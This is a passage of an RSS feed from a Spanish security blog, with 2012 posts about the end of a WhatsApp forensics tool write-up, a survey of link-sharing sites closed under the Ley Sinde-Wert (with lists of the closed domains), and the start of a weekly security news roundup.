&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Chat&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt; &lt;td&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-_DRXYOdNmAk/T6hsUhksRtI/AAAAAAAAACc/iX3C2UhfyUA/s1600/chatlist.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="313" src="http://4.bp.blogspot.com/-_DRXYOdNmAk/T6hsUhksRtI/AAAAAAAAACc/iX3C2UhfyUA/s320/chatlist.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Lista de Chats&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Como dije al principio del post, se trata de una beta y se le pueden agregar muchas más opciones que espero poder agregar. No obstante, toda contribución de ideas (se incorporarán al TODO) , manual o mejora (serán agregadas lo antes posible) es bienvenida.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: right;"&gt;
&lt;i&gt;&lt;b&gt;Artículo cortesía de&amp;nbsp;&lt;a href="https://twitter.com/#%21/sch3m4" target="_blank"&gt;Chema García&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-5734172745961513929?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/RVxMBOa705I" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/RVxMBOa705I/whatsapp-forensics.html</link><author>noreply@blogger.com (Contribuciones)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-memb_UZcyA4/T6FPYWWH1AI/AAAAAAAAAAM/EGzwgWbmYvA/s72-c/logo2.png" height="72" width="72" /><thr:total>5</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/whatsapp-forensics.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-7312221199035589891</guid><pubDate>Mon, 14 May 2012 06:30:00 +0000</pubDate><atom:updated>2012-05-14T08:30:03.800+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ley sinde</category><title>Desaparece un 11% de páginas de enlaces tras dos meses de Ley Sinde-Wert</title><description>&lt;br /&gt;
&lt;div class="separator" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"&gt;
&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-BmH7bst3Ciw/Td5qBOGKP6I/AAAAAAAAGRU/ViRKaXlTzhg/s320/ingles_ley_sinde.jpg" width="320" /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
¿&lt;b style="background-color: white; color: #666666; font-family: Verdana, sans-serif; font-size: 11px; line-height: 17px; text-align: justify;"&gt;Podrá La ley Sinde-Wert cerrar&lt;/b&gt;&lt;span style="background-color: white; color: #666666; font-family: Verdana, sans-serif; font-size: 11px; line-height: 17px; text-align: justify;"&gt;&amp;nbsp;SeriesYonkis? ¿Y SeriesPepito? ¿Y las más de 500 páginas similares? ¿Cómo está afectando la nueva ley a estos&amp;nbsp;&lt;/span&gt;&lt;b style="background-color: white; color: #666666; font-family: Verdana, sans-serif; font-size: 11px; line-height: 17px; text-align: justify;"&gt;sitios&amp;nbsp;de enlaces&lt;/b&gt;&lt;span style="background-color: white; color: #666666; font-family: Verdana, sans-serif; font-size: 11px; line-height: 17px; text-align: justify;"&gt;? ¿Qué medidas se pueden tomar? ¿Las han tomado ya? Estas preguntas trataba de responder hace ya un año en la siguiente entrada:&amp;nbsp;&lt;/span&gt;&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;a href="http://www.securitybydefault.com/2011/05/monitorizando-la-ley-sinde-hasta-donde.html"&gt;Monitorizando La Ley Sinde - ¿Hasta donde pueden llegar?&lt;/a&gt;&amp;nbsp;Un año después, vamos a ver los cambios.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;Para este&amp;nbsp;propósito&amp;nbsp;he actualizado la herramienta que construí la vez anterior y añadiendo una nueva variable: &lt;b&gt;páginas que ya no existen&lt;/b&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;Una vez puesta en marcha, los resultados son bastantes curiosos, de las &lt;b&gt;517 páginas&lt;/b&gt; un &lt;b&gt;11% han cerrado y ni si quiera el dominio se ha renovado.&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;También hay muchas de ellas que han tomado medidas para defenderse cuando sean atacadas. Como hizo &lt;a href="http://alt1040.com/2012/03/seriesyonkis-se-clona-para-esquivar-la-ley-sinde-wert"&gt;SeriesYonkis clonando su dominio&lt;/a&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;La siguiente gráfica muestra los resultados finales. &lt;b&gt;Un 33% de páginas pueden ser cerradas rápidamente&lt;/b&gt; por mantener alguno de sus componentes críticos en España (DNS o proveedor de acceso), un &lt;b&gt;58% están completamente fuera&lt;/b&gt; y requerirán coordinación con otros gobiernos y un &lt;b&gt;11% ha desaparecido.&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-Dz7GuOgyYRw/T66N1kJe26I/AAAAAAAAHBI/R5VvfgREdgY/s1600/dominios.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-Dz7GuOgyYRw/T66N1kJe26I/AAAAAAAAHBI/R5VvfgREdgY/s400/dominios.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;¿Es esto no una victoria de la aplicación de la Ley? Realmente no queda claro, si analizamos &lt;a href="http://pastebin.com/ZLWDzhQa"&gt;los datos del resultado del año&lt;/a&gt; pasado, se observa que el 65% de estas páginas no estaban sometidas a la ley directamente, ya que se alojaban fuera.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;Otro dato interesante es que ninguna de las webs cerradas tenía un "rank" alto en Alexa, lo que indica que apenas eran populares o tenían tráfico. Para hacernos una idea SeriesYonkis.com está en la posición 2.014 del mundo, nuestro modesto blog en la&amp;nbsp;&lt;/span&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;121.234 y el más alto de todos los suprimidos en la 257.696.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;Los números cambian radicalmente si tan solo se estudian las &lt;a href="http://www.xatakaon.com/tic/la-primera-lista-de-sinde-122-webs-que-seran-denunciadas-cuando-comience-a-funcionar-la-comision-de-cultura"&gt;122 páginas&lt;/a&gt; que se han filtrado por ser los objetivos de la famosa Ley, ya que el 63% de ellas están fuera del territorio nacional.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-wFLqf8dBLU0/T66WpO-kJVI/AAAAAAAAHBU/N0ofRmu4_T8/s1600/listanegra.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-wFLqf8dBLU0/T66WpO-kJVI/AAAAAAAAHBU/N0ofRmu4_T8/s400/listanegra.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;Las páginas de enlaces de la lista negra que han desaparecido son:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif; font-size: 11px; line-height: 17px;"&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif; font-size: 11px; line-height: 17px;"&gt;bitpirata.com&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif; font-size: 11px; line-height: 17px;"&gt;conemule.com&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif; font-size: 11px; line-height: 17px;"&gt;conexión24h.com&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif; font-size: 11px; line-height: 17px;"&gt;cowboysdelared.es&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif; font-size: 11px; line-height: 17px;"&gt;estrenosdt1.com&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif; font-size: 11px; line-height: 17px;"&gt;mundonds.net&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif; font-size: 11px; line-height: 17px;"&gt;torments.net&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;Las páginas que han cerrado del listado original que creamos:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;a3magazine.com &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;barriop2p.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;bitpirata.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;cinemula.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;cinepelis.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;conemule.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;descargasdirectasatope.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;descargasmix.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;dexcarga.org&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;divoox.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;divxendirecto.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;eliculas21.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;eliteclasicos.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;emutotal.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;estrenosonline.biz&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;gratispeliculasonline.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;guretorrents.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;hispatorrents.org&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;ironcine.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;irontorrent.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;locurands.org&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;mazodivx.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;miselinks.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;mooseries.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;nernsoong.net&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;okpeliculas.net&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;pasalaweb.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;pcestrenos.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;peliculaon.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;peliculas-online.cc&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;pelis-sevillistas56.net&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;portalestrenos.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;quecanal.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;realfilmz.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;seriestube.net&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;seriesypelisonline.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;taquillaspa.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;todogratisonline.net&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;torments.net&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;verpeli.net&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;viciopando.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;viciowarez.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;wuapi.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;miserie.es&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;onlinepelis.es&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;paginas-infantiles.iespana.es&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;peliculasflv.es&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;toptorrent.es&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;lanzamientosmp3.es&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;docutube.es&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;cowboysdelared.es&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;cantabriatorrent.es&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;animenojutsu.es&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;cineyoutube.es&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-size: 11px; line-height: 17px;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #666666; font-family: Verdana, sans-serif;"&gt;&lt;span style="font-size: 11px; line-height: 17px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-7312221199035589891?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/cC1TxBBnaDM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/cC1TxBBnaDM/desaparece-un-11-de-paginas-de-enlaces.html</link><author>noreply@blogger.com (Alejandro Ramos)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-BmH7bst3Ciw/Td5qBOGKP6I/AAAAAAAAGRU/ViRKaXlTzhg/s72-c/ingles_ley_sinde.jpg" height="72" width="72" /><thr:total>5</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/desaparece-un-11-de-paginas-de-enlaces.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-3197945992566874862</guid><pubDate>Sun, 13 May 2012 08:00:00 +0000</pubDate><atom:updated>2012-05-13T10:00:05.967+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">secmana</category><title>Enlaces de la SECmana - 123</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/_fWA7DVpD2eo/TG6clsxg-qI/AAAAAAAAAek/nE1WBc8GrT0/s1600/informe-secmanal-banner.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" height="88" src="http://3.bp.blogspot.com/_fWA7DVpD2eo/TG6clsxg-qI/AAAAAAAAAek/nE1WBc8GrT0/s1600/informe-secmanal-banner.jpg" width="399" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;La noticia de la semana, sin duda, ha sido la &lt;a href="http://paintsthefuture.com/more-than-55000-twitter-accounts-usernames-passwords-are-hacked-and-leaked/"&gt;publicación de más de 55,000 cuentas de Twitter mediante 5 posts en pastebin&lt;/a&gt;. Al final resultaron ser, en su mayoría, cuentas utilizadas para SPAM o cuentas ya deshabilitadas, pero se encontraban algunas funcionales, como la del actor &lt;i&gt;Mark Ruffalo&lt;/i&gt; que encarna a Hulk en la última película de los Vengadores.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Se presenta &lt;b&gt;&lt;a href="http://passfault.com/passwords.shtml#menu" target="_blank"&gt;Passfault&lt;/a&gt;&lt;/b&gt;, el &lt;a href="http://owasp.blogspot.com.es/2012/05/for-better-password-policies-owasp.html" target="_blank"&gt;proyecto OWASP&lt;/a&gt; que evalúa la fuerza de contraseñas con precisión suficiente para predecir el tiempo a poder crackearse. Permite &amp;nbsp;hacer mucho más intuitiva y sencilla la creación de contraseñas y políticas de contraseñas.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.ruxconbreakpoint.com/call-for-papers/"&gt;Abierto el &lt;i&gt;Call For Papers&lt;/i&gt; (Solicitud de ponencias) para la BreakPoint 2012&lt;/a&gt;, que se celebra en Australia el 17 y 18 de Octubre. Justo a los tres días siguientes, también en Australia, recordamos que se celebra la &lt;a href="http://www.ruxcon.org.au/call-for-papers-2012/"&gt;RuxCON&lt;/a&gt; por los mismos organizadores, pero con un talante un poco más especializado.&lt;/li&gt;
